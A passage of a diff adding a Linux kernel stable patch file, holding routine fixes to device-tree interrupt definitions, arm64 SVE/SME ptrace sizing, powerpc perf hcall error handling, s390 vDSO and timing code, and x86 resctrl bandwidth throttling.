++				  "tint12", "tint13", "tint14", "tint15",
++				  "tint16", "tint17", "tint18", "tint19",
++				  "tint20", "tint21", "tint22", "tint23",
++				  "tint24", "tint25", "tint26", "tint27",
++				  "tint28", "tint29", "tint30", "tint31",
++				  "bus-err", "ec7tie1-0", "ec7tie2-0",
++				  "ec7tiovf-0", "ec7tie1-1", "ec7tie2-1",
++				  "ec7tiovf-1";
++		clocks = <&cpg CPG_MOD R9A07G043_IA55_CLK>,
++			<&cpg CPG_MOD R9A07G043_IA55_PCLK>;
++		clock-names = "clk", "pclk";
++		power-domains = <&cpg>;
++		resets = <&cpg R9A07G043_IA55_RESETN>;
++	};
++
++	gic: interrupt-controller@11900000 {
++		compatible = "arm,gic-v3";
++		#interrupt-cells = <3>;
++		#address-cells = <0>;
++		interrupt-controller;
++		reg = <0x0 0x11900000 0 0x40000>,
++		      <0x0 0x11940000 0 0x60000>;
++		interrupts = <GIC_PPI 9 IRQ_TYPE_LEVEL_LOW>;
++	};
++};
++
++&sysc {
++	interrupts = <SOC_PERIPHERAL_IRQ(42) IRQ_TYPE_LEVEL_HIGH>,
++		     <SOC_PERIPHERAL_IRQ(43) IRQ_TYPE_LEVEL_HIGH>,
++		     <SOC_PERIPHERAL_IRQ(44) IRQ_TYPE_LEVEL_HIGH>,
++		     <SOC_PERIPHERAL_IRQ(45) IRQ_TYPE_LEVEL_HIGH>;
++	interrupt-names = "lpm_int", "ca55stbydone_int",
++			  "cm33stbyr_int", "ca55_deny";
++};
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g044.dtsi b/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
+index 7dbf6a6292f49..d26488b5a82df 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
+@@ -698,7 +698,27 @@ irqc: interrupt-controller@110a0000 {
+ 				     <GIC_SPI 472 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 473 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 474 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 475 IRQ_TYPE_LEVEL_HIGH>;
++				     <GIC_SPI 475 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 25 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 34 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 35 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 36 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 37 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 38 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 39 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "nmi", "irq0", "irq1", "irq2", "irq3",
++					  "irq4", "irq5", "irq6", "irq7",
++					  "tint0", "tint1", "tint2", "tint3",
++					  "tint4", "tint5", "tint6", "tint7",
++					  "tint8", "tint9", "tint10", "tint11",
++					  "tint12", "tint13", "tint14", "tint15",
++					  "tint16", "tint17", "tint18", "tint19",
++					  "tint20", "tint21", "tint22", "tint23",
++					  "tint24", "tint25", "tint26", "tint27",
++					  "tint28", "tint29", "tint30", "tint31",
++					  "bus-err", "ec7tie1-0", "ec7tie2-0",
++					  "ec7tiovf-0", "ec7tie1-1", "ec7tie2-1",
++					  "ec7tiovf-1";
+ 			clocks = <&cpg CPG_MOD R9A07G044_IA55_CLK>,
+ 				 <&cpg CPG_MOD R9A07G044_IA55_PCLK>;
+ 			clock-names = "clk", "pclk";
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g054.dtsi b/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
+index e000510b90a42..b3d37ca942ee3 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
+@@ -704,7 +704,27 @@ irqc: interrupt-controller@110a0000 {
+ 				     <GIC_SPI 472 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 473 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 474 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 475 IRQ_TYPE_LEVEL_HIGH>;
++				     <GIC_SPI 475 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 25 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 34 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 35 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 36 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 37 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 38 IRQ_TYPE_EDGE_RISING>,
++				     <GIC_SPI 39 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "nmi", "irq0", "irq1", "irq2", "irq3",
++					  "irq4", "irq5", "irq6", "irq7",
++					  "tint0", "tint1", "tint2", "tint3",
++					  "tint4", "tint5", "tint6", "tint7",
++					  "tint8", "tint9", "tint10", "tint11",
++					  "tint12", "tint13", "tint14", "tint15",
++					  "tint16", "tint17", "tint18", "tint19",
++					  "tint20", "tint21", "tint22", "tint23",
++					  "tint24", "tint25", "tint26", "tint27",
++					  "tint28", "tint29", "tint30", "tint31",
++					  "bus-err", "ec7tie1-0", "ec7tie2-0",
++					  "ec7tiovf-0", "ec7tie1-1", "ec7tie2-1",
++					  "ec7tiovf-1";
+ 			clocks = <&cpg CPG_MOD R9A07G054_IA55_CLK>,
+ 				 <&cpg CPG_MOD R9A07G054_IA55_PCLK>;
+ 			clock-names = "clk", "pclk";
+diff --git a/arch/arm64/boot/dts/renesas/ulcb-kf.dtsi b/arch/arm64/boot/dts/renesas/ulcb-kf.dtsi
+index 588b14b66b6fb..f37abfc13fe59 100644
+--- a/arch/arm64/boot/dts/renesas/ulcb-kf.dtsi
++++ b/arch/arm64/boot/dts/renesas/ulcb-kf.dtsi
+@@ -251,6 +251,7 @@ gpio_exp_74: gpio@74 {
+ 		gpio-controller;
+ 		#gpio-cells = <2>;
+ 		interrupt-controller;
++		#interrupt-cells = <2>;
+ 		interrupt-parent = <&gpio6>;
+ 		interrupts = <8 IRQ_TYPE_EDGE_FALLING>;
+ 
+@@ -311,6 +312,7 @@ gpio_exp_75: gpio@75 {
+ 		gpio-controller;
+ 		#gpio-cells = <2>;
+ 		interrupt-controller;
++		#interrupt-cells = <2>;
+ 		interrupt-parent = <&gpio6>;
+ 		interrupts = <4 IRQ_TYPE_EDGE_FALLING>;
+ 	};
+@@ -331,6 +333,7 @@ gpio_exp_76: gpio@76 {
+ 		gpio-controller;
+ 		#gpio-cells = <2>;
+ 		interrupt-controller;
++		#interrupt-cells = <2>;
+ 		interrupt-parent = <&gpio7>;
+ 		interrupts = <3 IRQ_TYPE_EDGE_FALLING>;
+ 	};
+@@ -341,6 +344,7 @@ gpio_exp_77: gpio@77 {
+ 		gpio-controller;
+ 		#gpio-cells = <2>;
+ 		interrupt-controller;
++		#interrupt-cells = <2>;
+ 		interrupt-parent = <&gpio5>;
+ 		interrupts = <9 IRQ_TYPE_EDGE_FALLING>;
+ 	};
+diff --git a/arch/arm64/boot/dts/rockchip/rk356x.dtsi b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+index f4d6dbbbddcd4..99ad6fc51b584 100644
+--- a/arch/arm64/boot/dts/rockchip/rk356x.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+@@ -596,6 +596,7 @@ vpu: video-codec@fdea0400 {
+ 		compatible = "rockchip,rk3568-vpu";
+ 		reg = <0x0 0xfdea0000 0x0 0x800>;
+ 		interrupts = <GIC_SPI 139 IRQ_TYPE_LEVEL_HIGH>;
++		interrupt-names = "vdpu";
+ 		clocks = <&cru ACLK_VPU>, <&cru HCLK_VPU>;
+ 		clock-names = "aclk", "hclk";
+ 		iommus = <&vdpu_mmu>;
+diff --git a/arch/arm64/include/asm/fpsimd.h b/arch/arm64/include/asm/fpsimd.h
+index da18413712c04..930b0e6c94622 100644
+--- a/arch/arm64/include/asm/fpsimd.h
++++ b/arch/arm64/include/asm/fpsimd.h
+@@ -36,13 +36,13 @@
+  * When we defined the maximum SVE vector length we defined the ABI so
+  * that the maximum vector length included all the reserved for future
+  * expansion bits in ZCR rather than those just currently defined by
+- * the architecture. While SME follows a similar pattern the fact that
+- * it includes a square matrix means that any allocations that attempt
+- * to cover the maximum potential vector length (such as happen with
+- * the regset used for ptrace) end up being extremely large. Define
+- * the much lower actual limit for use in such situations.
++ * the architecture.  Using this length to allocate worst-case buffers
++ * results in excessively large allocations, and this effect is even
++ * more pronounced for SME due to ZA.  Define more suitable VLs for
++ * these situations.
+  */
+-#define SME_VQ_MAX	16
++#define ARCH_SVE_VQ_MAX ((ZCR_ELx_LEN_MASK >> ZCR_ELx_LEN_SHIFT) + 1)
++#define SME_VQ_MAX	((SMCR_ELx_LEN_MASK >> SMCR_ELx_LEN_SHIFT) + 1)
+ 
+ struct task_struct;
+ 
+diff --git a/arch/arm64/kernel/ptrace.c b/arch/arm64/kernel/ptrace.c
+index e1f6366b7ccdf..d02dd2be17b3b 100644
+--- a/arch/arm64/kernel/ptrace.c
++++ b/arch/arm64/kernel/ptrace.c
+@@ -1450,7 +1450,8 @@ static const struct user_regset aarch64_regsets[] = {
+ #ifdef CONFIG_ARM64_SVE
+ 	[REGSET_SVE] = { /* Scalable Vector Extension */
+ 		.core_note_type = NT_ARM_SVE,
+-		.n = DIV_ROUND_UP(SVE_PT_SIZE(SVE_VQ_MAX, SVE_PT_REGS_SVE),
++		.n = DIV_ROUND_UP(SVE_PT_SIZE(ARCH_SVE_VQ_MAX,
++					      SVE_PT_REGS_SVE),
+ 				  SVE_VQ_BYTES),
+ 		.size = SVE_VQ_BYTES,
+ 		.align = SVE_VQ_BYTES,
+diff --git a/arch/mips/include/asm/ptrace.h b/arch/mips/include/asm/ptrace.h
+index daf3cf244ea97..b3e4dd6be7e20 100644
+--- a/arch/mips/include/asm/ptrace.h
++++ b/arch/mips/include/asm/ptrace.h
+@@ -60,6 +60,7 @@ static inline void instruction_pointer_set(struct pt_regs *regs,
+                                            unsigned long val)
+ {
+ 	regs->cp0_epc = val;
++	regs->cp0_cause &= ~CAUSEF_BD;
+ }
+ 
+ /* Query offset/name of register from its name/offset */
+diff --git a/arch/parisc/kernel/ftrace.c b/arch/parisc/kernel/ftrace.c
+index 4d392e4ed3584..ac7253891d5ed 100644
+--- a/arch/parisc/kernel/ftrace.c
++++ b/arch/parisc/kernel/ftrace.c
+@@ -78,7 +78,7 @@ void notrace __hot ftrace_function_trampoline(unsigned long parent,
+ #endif
+ }
+ 
+-#ifdef CONFIG_FUNCTION_GRAPH_TRACER
++#if defined(CONFIG_DYNAMIC_FTRACE) && defined(CONFIG_FUNCTION_GRAPH_TRACER)
+ int ftrace_enable_ftrace_graph_caller(void)
+ {
+ 	static_key_enable(&ftrace_graph_enable.key);
+diff --git a/arch/powerpc/include/asm/vmalloc.h b/arch/powerpc/include/asm/vmalloc.h
+index 4c69ece52a31e..59ed89890c902 100644
+--- a/arch/powerpc/include/asm/vmalloc.h
++++ b/arch/powerpc/include/asm/vmalloc.h
+@@ -7,14 +7,14 @@
+ #ifdef CONFIG_HAVE_ARCH_HUGE_VMAP
+ 
+ #define arch_vmap_pud_supported arch_vmap_pud_supported
+-static inline bool arch_vmap_pud_supported(pgprot_t prot)
++static __always_inline bool arch_vmap_pud_supported(pgprot_t prot)
+ {
+ 	/* HPT does not cope with large pages in the vmalloc area */
+ 	return radix_enabled();
+ }
+ 
+ #define arch_vmap_pmd_supported arch_vmap_pmd_supported
+-static inline bool arch_vmap_pmd_supported(pgprot_t prot)
++static __always_inline bool arch_vmap_pmd_supported(pgprot_t prot)
+ {
+ 	return radix_enabled();
+ }
+diff --git a/arch/powerpc/perf/hv-gpci.c b/arch/powerpc/perf/hv-gpci.c
+index 7ff8ff3509f5f..943248a0e9a9d 100644
+--- a/arch/powerpc/perf/hv-gpci.c
++++ b/arch/powerpc/perf/hv-gpci.c
+@@ -164,6 +164,20 @@ static unsigned long single_gpci_request(u32 req, u32 starting_index,
+ 
+ 	ret = plpar_hcall_norets(H_GET_PERF_COUNTER_INFO,
+ 			virt_to_phys(arg), HGPCI_REQ_BUFFER_SIZE);
++
++	/*
++	 * A ret value of 'H_PARAMETER' with detail_rc as 'GEN_BUF_TOO_SMALL'
++	 * specifies that the current buffer size cannot accommodate
++	 * all the information, and that a partial buffer was returned.
++	 * Since in this function we only access data for a given starting index,
++	 * we don't need the whole buffer and can get the required count by
++	 * accessing the first entry's data.
++	 * Hence the hcall fails only in case the ret value is other than H_SUCCESS
++	 * or H_PARAMETER with a detail_rc value of GEN_BUF_TOO_SMALL (0x1B).
++	 */
++	if (ret == H_PARAMETER && be32_to_cpu(arg->params.detail_rc) == 0x1B)
++		ret = 0;
++
+ 	if (ret) {
+ 		pr_devel("hcall failed: 0x%lx\n", ret);
+ 		goto out;
+@@ -228,6 +242,7 @@ static int h_gpci_event_init(struct perf_event *event)
+ {
+ 	u64 count;
+ 	u8 length;
++	unsigned long ret;
+ 
+ 	/* Not our event */
+ 	if (event->attr.type != event->pmu->type)
+@@ -258,13 +273,23 @@ static int h_gpci_event_init(struct perf_event *event)
+ 	}
+ 
+ 	/* check if the request works... */
+-	if (single_gpci_request(event_get_request(event),
++	ret = single_gpci_request(event_get_request(event),
+ 				event_get_starting_index(event),
+ 				event_get_secondary_index(event),
+ 				event_get_counter_info_version(event),
+ 				event_get_offset(event),
+ 				length,
+-				&count)) {
++				&count);
++
++	/*
++	 * A ret value of H_AUTHORITY implies that the partition is not permitted
++	 * to retrieve performance information, and is required to set the
++	 * "Enable Performance Information Collection" option.
++	 */
++	if (ret == H_AUTHORITY)
++		return -EPERM;
++
++	if (ret) {
+ 		pr_devel("gpci hcall failed\n");
+ 		return -EINVAL;
+ 	}
+diff --git a/arch/powerpc/platforms/embedded6xx/linkstation.c b/arch/powerpc/platforms/embedded6xx/linkstation.c
+index 1830e1ac1f8f0..107a8b60ad0c9 100644
+--- a/arch/powerpc/platforms/embedded6xx/linkstation.c
++++ b/arch/powerpc/platforms/embedded6xx/linkstation.c
+@@ -99,9 +99,6 @@ static void __init linkstation_init_IRQ(void)
+ 	mpic_init(mpic);
+ }
+ 
+-extern void avr_uart_configure(void);
+-extern void avr_uart_send(const char);
+-
+ static void __noreturn linkstation_restart(char *cmd)
+ {
+ 	local_irq_disable();
+diff --git a/arch/powerpc/platforms/embedded6xx/mpc10x.h b/arch/powerpc/platforms/embedded6xx/mpc10x.h
+index 5ad12023e5628..ebc258fa4858d 100644
+--- a/arch/powerpc/platforms/embedded6xx/mpc10x.h
++++ b/arch/powerpc/platforms/embedded6xx/mpc10x.h
+@@ -156,4 +156,7 @@ int mpc10x_disable_store_gathering(struct pci_controller *hose);
+ /* For MPC107 boards that use the built-in openpic */
+ void mpc10x_set_openpic(void);
+ 
++void avr_uart_configure(void);
++void avr_uart_send(const char c);
++
+ #endif	/* __PPC_KERNEL_MPC10X_H */
+diff --git a/arch/powerpc/platforms/pseries/papr_platform_attributes.c b/arch/powerpc/platforms/pseries/papr_platform_attributes.c
+index 526c621b098be..eea2041b270b5 100644
+--- a/arch/powerpc/platforms/pseries/papr_platform_attributes.c
++++ b/arch/powerpc/platforms/pseries/papr_platform_attributes.c
+@@ -101,10 +101,12 @@ static int papr_get_attr(u64 id, struct energy_scale_attribute *esi)
+ 		esi_buf_size = ESI_HDR_SIZE + (CURR_MAX_ESI_ATTRS * max_esi_attrs);
+ 
+ 		temp_buf = krealloc(buf, esi_buf_size, GFP_KERNEL);
+-		if (temp_buf)
++		if (temp_buf) {
+ 			buf = temp_buf;
+-		else
+-			return -ENOMEM;
++		} else {
++			ret = -ENOMEM;
++			goto out_buf;
++		}
+ 
+ 		goto retry;
+ 	}
+diff --git a/arch/riscv/boot/dts/sifive/hifive-unmatched-a00.dts b/arch/riscv/boot/dts/sifive/hifive-unmatched-a00.dts
+index 07387f9c135ca..72b87b08ab444 100644
+--- a/arch/riscv/boot/dts/sifive/hifive-unmatched-a00.dts
++++ b/arch/riscv/boot/dts/sifive/hifive-unmatched-a00.dts
+@@ -123,6 +123,7 @@ pmic@58 {
+ 		interrupt-parent = <&gpio>;
+ 		interrupts = <1 IRQ_TYPE_LEVEL_LOW>;
+ 		interrupt-controller;
++		#interrupt-cells = <2>;
+ 
+ 		onkey {
+ 			compatible = "dlg,da9063-onkey";
+diff --git a/arch/s390/include/uapi/asm/dasd.h b/arch/s390/include/uapi/asm/dasd.h
+index 93d1ccd3304c7..9c49c3d67cd56 100644
+--- a/arch/s390/include/uapi/asm/dasd.h
++++ b/arch/s390/include/uapi/asm/dasd.h
+@@ -78,6 +78,7 @@ typedef struct dasd_information2_t {
+  * 0x040: give access to raw eckd data
+  * 0x080: enable discard support
+  * 0x100: enable autodisable for IFCC errors (default)
++ * 0x200: enable requeue of all requests on autoquiesce
+  */
+ #define DASD_FEATURE_READONLY	      0x001
+ #define DASD_FEATURE_USEDIAG	      0x002
+@@ -88,6 +89,7 @@ typedef struct dasd_information2_t {
+ #define DASD_FEATURE_USERAW	      0x040
+ #define DASD_FEATURE_DISCARD	      0x080
+ #define DASD_FEATURE_PATH_AUTODISABLE 0x100
++#define DASD_FEATURE_REQUEUEQUIESCE   0x200
+ #define DASD_FEATURE_DEFAULT	      DASD_FEATURE_PATH_AUTODISABLE
+ 
+ #define DASD_PARTN_BITS 2
+diff --git a/arch/s390/kernel/cache.c b/arch/s390/kernel/cache.c
+index 7ee3651d00abe..732024ca005ad 100644
+--- a/arch/s390/kernel/cache.c
++++ b/arch/s390/kernel/cache.c
+@@ -166,5 +166,6 @@ int populate_cache_leaves(unsigned int cpu)
+ 			ci_leaf_init(this_leaf++, pvt, ctype, level, cpu);
+ 		}
+ 	}
++	this_cpu_ci->cpu_map_populated = true;
+ 	return 0;
+ }
+diff --git a/arch/s390/kernel/perf_pai_crypto.c b/arch/s390/kernel/perf_pai_crypto.c
+index 6826e2a69a216..f61a652046cfb 100644
+--- a/arch/s390/kernel/perf_pai_crypto.c
++++ b/arch/s390/kernel/perf_pai_crypto.c
+@@ -647,7 +647,7 @@ static int __init attr_event_init(void)
+ 	for (i = 0; i < ARRAY_SIZE(paicrypt_ctrnames); i++) {
+ 		ret = attr_event_init_one(attrs, i);
+ 		if (ret) {
+-			attr_event_free(attrs, i - 1);
++			attr_event_free(attrs, i);
+ 			return ret;
+ 		}
+ 	}
+diff --git a/arch/s390/kernel/perf_pai_ext.c b/arch/s390/kernel/perf_pai_ext.c
+index 74b53c531e0cd..b4d89654183a2 100644
+--- a/arch/s390/kernel/perf_pai_ext.c
++++ b/arch/s390/kernel/perf_pai_ext.c
+@@ -612,7 +612,7 @@ static int __init attr_event_init(void)
+ 	for (i = 0; i < ARRAY_SIZE(paiext_ctrnames); i++) {
+ 		ret = attr_event_init_one(attrs, i);
+ 		if (ret) {
+-			attr_event_free(attrs, i - 1);
++			attr_event_free(attrs, i);
+ 			return ret;
+ 		}
+ 	}
+diff --git a/arch/s390/kernel/vdso32/Makefile b/arch/s390/kernel/vdso32/Makefile
+index 245bddfe9bc0e..cc513add48eb5 100644
+--- a/arch/s390/kernel/vdso32/Makefile
++++ b/arch/s390/kernel/vdso32/Makefile
+@@ -22,7 +22,7 @@ KBUILD_AFLAGS_32 += -m31 -s
+ KBUILD_CFLAGS_32 := $(filter-out -m64,$(KBUILD_CFLAGS))
+ KBUILD_CFLAGS_32 += -m31 -fPIC -shared -fno-common -fno-builtin
+ 
+-LDFLAGS_vdso32.so.dbg += -fPIC -shared -soname=linux-vdso32.so.1 \
++LDFLAGS_vdso32.so.dbg += -shared -soname=linux-vdso32.so.1 \
+ 	--hash-style=both --build-id=sha1 -melf_s390 -T
+ 
+ $(targets:%=$(obj)/%.dbg): KBUILD_CFLAGS = $(KBUILD_CFLAGS_32)
+diff --git a/arch/s390/kernel/vdso64/Makefile b/arch/s390/kernel/vdso64/Makefile
+index 1605ba45ac4c0..42d918d50a1ff 100644
+--- a/arch/s390/kernel/vdso64/Makefile
++++ b/arch/s390/kernel/vdso64/Makefile
+@@ -26,7 +26,7 @@ KBUILD_AFLAGS_64 += -m64 -s
+ 
+ KBUILD_CFLAGS_64 := $(filter-out -m64,$(KBUILD_CFLAGS))
+ KBUILD_CFLAGS_64 += -m64 -fPIC -fno-common -fno-builtin
+-ldflags-y := -fPIC -shared -soname=linux-vdso64.so.1 \
++ldflags-y := -shared -soname=linux-vdso64.so.1 \
+ 	     --hash-style=both --build-id=sha1 -T
+ 
+ $(targets:%=$(obj)/%.dbg): KBUILD_CFLAGS = $(KBUILD_CFLAGS_64)
+diff --git a/arch/s390/kernel/vtime.c b/arch/s390/kernel/vtime.c
+index 9436f3053b88c..003c926a0f4de 100644
+--- a/arch/s390/kernel/vtime.c
++++ b/arch/s390/kernel/vtime.c
+@@ -210,13 +210,13 @@ void vtime_flush(struct task_struct *tsk)
+ 		virt_timer_expire();
+ 
+ 	steal = S390_lowcore.steal_timer;
+-	avg_steal = S390_lowcore.avg_steal_timer / 2;
++	avg_steal = S390_lowcore.avg_steal_timer;
+ 	if ((s64) steal > 0) {
+ 		S390_lowcore.steal_timer = 0;
+ 		account_steal_time(cputime_to_nsecs(steal));
+ 		avg_steal += steal;
+ 	}
+-	S390_lowcore.avg_steal_timer = avg_steal;
++	S390_lowcore.avg_steal_timer = avg_steal / 2;
+ }
+ 
+ static u64 vtime_delta(void)
+diff --git a/arch/sparc/kernel/leon_pci_grpci1.c b/arch/sparc/kernel/leon_pci_grpci1.c
+index e6935d0ac1ec9..c32590bdd3120 100644
+--- a/arch/sparc/kernel/leon_pci_grpci1.c
++++ b/arch/sparc/kernel/leon_pci_grpci1.c
+@@ -696,7 +696,7 @@ static int grpci1_of_probe(struct platform_device *ofdev)
+ 	return err;
+ }
+ 
+-static const struct of_device_id grpci1_of_match[] __initconst = {
++static const struct of_device_id grpci1_of_match[] = {
+ 	{
+ 	 .name = "GAISLER_PCIFBRG",
+ 	 },
+diff --git a/arch/sparc/kernel/leon_pci_grpci2.c b/arch/sparc/kernel/leon_pci_grpci2.c
+index ca22f93d90454..dd06abc61657f 100644
+--- a/arch/sparc/kernel/leon_pci_grpci2.c
++++ b/arch/sparc/kernel/leon_pci_grpci2.c
+@@ -887,7 +887,7 @@ static int grpci2_of_probe(struct platform_device *ofdev)
+ 	return err;
+ }
+ 
+-static const struct of_device_id grpci2_of_match[] __initconst = {
++static const struct of_device_id grpci2_of_match[] = {
+ 	{
+ 	 .name = "GAISLER_GRPCI2",
+ 	 },
+diff --git a/arch/x86/events/amd/core.c b/arch/x86/events/amd/core.c
+index 04f4b96dec6df..fd091b9dd7067 100644
+--- a/arch/x86/events/amd/core.c
++++ b/arch/x86/events/amd/core.c
+@@ -604,7 +604,6 @@ static void amd_pmu_cpu_dead(int cpu)
+ 
+ 	kfree(cpuhw->lbr_sel);
+ 	cpuhw->lbr_sel = NULL;
+-	amd_pmu_cpu_reset(cpu);
+ 
+ 	if (!x86_pmu.amd_nb_constraints)
+ 		return;
+diff --git a/arch/x86/include/asm/vsyscall.h b/arch/x86/include/asm/vsyscall.h
+index ab60a71a8dcb9..472f0263dbc61 100644
+--- a/arch/x86/include/asm/vsyscall.h
++++ b/arch/x86/include/asm/vsyscall.h
+@@ -4,6 +4,7 @@
+ 
+ #include <linux/seqlock.h>
+ #include <uapi/asm/vsyscall.h>
++#include <asm/page_types.h>
+ 
+ #ifdef CONFIG_X86_VSYSCALL_EMULATION
+ extern void map_vsyscall(void);
+@@ -24,4 +25,13 @@ static inline bool emulate_vsyscall(unsigned long error_code,
+ }
+ #endif
+ 
++/*
++ * The (legacy) vsyscall page is the lone page in the kernel portion
++ * of the address space that has user-accessible permissions.
++ */
++static inline bool is_vsyscall_vaddr(unsigned long vaddr)
++{
++	return unlikely((vaddr & PAGE_MASK) == VSYSCALL_ADDR);
++}
++
+ #endif /* _ASM_X86_VSYSCALL_H */
+diff --git a/arch/x86/kernel/acpi/cppc.c b/arch/x86/kernel/acpi/cppc.c
+index 8d8752b44f113..ff8f25faca3dd 100644
+--- a/arch/x86/kernel/acpi/cppc.c
++++ b/arch/x86/kernel/acpi/cppc.c
+@@ -20,7 +20,7 @@ bool cpc_supported_by_cpu(void)
+ 		    (boot_cpu_data.x86_model >= 0x20 && boot_cpu_data.x86_model <= 0x2f)))
+ 			return true;
+ 		else if (boot_cpu_data.x86 == 0x17 &&
+-			 boot_cpu_data.x86_model >= 0x70 && boot_cpu_data.x86_model <= 0x7f)
++			 boot_cpu_data.x86_model >= 0x30 && boot_cpu_data.x86_model <= 0x7f)
+ 			return true;
+ 		return boot_cpu_has(X86_FEATURE_CPPC);
+ 	}
+diff --git a/arch/x86/kernel/cpu/resctrl/internal.h b/arch/x86/kernel/cpu/resctrl/internal.h
+index 0b5c6c76f6f7b..4761d489a117a 100644
+--- a/arch/x86/kernel/cpu/resctrl/internal.h
++++ b/arch/x86/kernel/cpu/resctrl/internal.h
+@@ -281,14 +281,10 @@ struct rftype {
+  * struct mbm_state - status for each MBM counter in each domain
+  * @prev_bw_bytes: Previous bytes value read for bandwidth calculation
+  * @prev_bw:	The most recent bandwidth in MBps
+- * @delta_bw:	Difference between the current and previous bandwidth
+- * @delta_comp:	Indicates whether to compute the delta_bw
+  */
+ struct mbm_state {
+ 	u64	prev_bw_bytes;
+ 	u32	prev_bw;
+-	u32	delta_bw;
+-	bool	delta_comp;
+ };
+ 
+ /**
+diff --git a/arch/x86/kernel/cpu/resctrl/monitor.c b/arch/x86/kernel/cpu/resctrl/monitor.c
+index 77538abeb72af..b9adb707750c6 100644
+--- a/arch/x86/kernel/cpu/resctrl/monitor.c
++++ b/arch/x86/kernel/cpu/resctrl/monitor.c
+@@ -428,9 +428,6 @@ static void mbm_bw_count(u32 rmid, struct rmid_read *rr)
+ 
+ 	cur_bw = bytes / SZ_1M;
+ 
+-	if (m->delta_comp)
+-		m->delta_bw = abs(cur_bw - m->prev_bw);
+-	m->delta_comp = false;
+ 	m->prev_bw = cur_bw;
+ }
+ 
+@@ -508,11 +505,11 @@ static void update_mba_bw(struct rdtgroup *rgrp, struct rdt_domain *dom_mbm)
+ {
+ 	u32 closid, rmid, cur_msr_val, new_msr_val;
+ 	struct mbm_state *pmbm_data, *cmbm_data;
+-	u32 cur_bw, delta_bw, user_bw;
+ 	struct rdt_resource *r_mba;
+ 	struct rdt_domain *dom_mba;
+ 	struct list_head *head;
+ 	struct rdtgroup *entry;
++	u32 cur_bw, user_bw;
+ 
+ 	if (!is_mbm_local_enabled())
+ 		return;
+@@ -531,7 +528,6 @@ static void update_mba_bw(struct rdtgroup *rgrp, struct rdt_domain *dom_mbm)
+ 
+ 	cur_bw = pmbm_data->prev_bw;
+ 	user_bw = dom_mba->mbps_val[closid];
+-	delta_bw = pmbm_data->delta_bw;
+ 
+ 	/* MBA resource doesn't support CDP */
+ 	cur_msr_val = resctrl_arch_get_config(r_mba, dom_mba, closid, CDP_NONE);
+@@ -543,49 +539,31 @@ static void update_mba_bw(struct rdtgroup *rgrp, struct rdt_domain *dom_mbm)
+ 	list_for_each_entry(entry, head, mon.crdtgrp_list) {
+ 		cmbm_data = &dom_mbm->mbm_local[entry->mon.rmid];
+ 		cur_bw += cmbm_data->prev_bw;
+-		delta_bw += cmbm_data->delta_bw;
+ 	}
+ 
+ 	/*
+ 	 * Scale up/down the bandwidth linearly for the ctrl group.  The
+ 	 * bandwidth step is the bandwidth granularity specified by the
+ 	 * hardware.
+-	 *
+-	 * The delta_bw is used when increasing the bandwidth so that we
+-	 * dont alternately increase and decrease the control values
+-	 * continuously.
+-	 *
+-	 * For ex: consider cur_bw = 90MBps, user_bw = 100MBps and if
+-	 * bandwidth step is 20MBps(> user_bw - cur_bw), we would keep
+-	 * switching between 90 and 110 continuously if we only check
+-	 * cur_bw < user_bw.
++	 * Always increase throttling if the current bandwidth is above the
++	 * target set by the user.
++	 * But avoid thrashing up and down on every poll by checking
++	 * whether a decrease in throttling is likely to push the group
++	 * back over target. E.g. if currently throttling to 30% of bandwidth
++	 * on a system with 10% granularity steps, check whether moving to
++	 * 40% would go past the limit by multiplying current bandwidth by
++	 * "(30 + 10) / 30".
+ 	 */
+ 	if (cur_msr_val > r_mba->membw.min_bw && user_bw < cur_bw) {
+ 		new_msr_val = cur_msr_val - r_mba->membw.bw_gran;
+ 	} else if (cur_msr_val < MAX_MBA_BW &&
+-		   (user_bw > (cur_bw + delta_bw))) {
++		   (user_bw > (cur_bw * (cur_msr_val + r_mba->membw.min_bw) / cur_msr_val))) {
+ 		new_msr_val = cur_msr_val + r_mba->membw.bw_gran;
+ 	} else {
+ 		return;
+ 	}
+ 
+ 	resctrl_arch_update_one(r_mba, dom_mba, closid, CDP_NONE, new_msr_val);
+-
+-	/*
+-	 * Delta values are updated dynamically package wise for each
+-	 * rdtgrp every time the throttle MSR changes value.
+-	 *
+-	 * This is because (1)the increase in bandwidth is not perfectly
+-	 * linear and only "approximately" linear even when the hardware
+-	 * says it is linear.(2)Also since MBA is a core specific
+-	 * mechanism, the delta values vary based on number of cores used
+-	 * by the rdtgrp.
+-	 */
+-	pmbm_data->delta_comp = true;
+-	list_for_each_entry(entry, head, mon.crdtgrp_list) {
+-		cmbm_data = &dom_mbm->mbm_local[entry->mon.rmid];
+-		cmbm_data->delta_comp = true;
+-	}
+ }
+ 
+ static void mbm_update(struct rdt_resource *r, struct rdt_domain *d, int rmid)
+diff --git a/arch/x86/mm/fault.c b/arch/x86/mm/fault.c
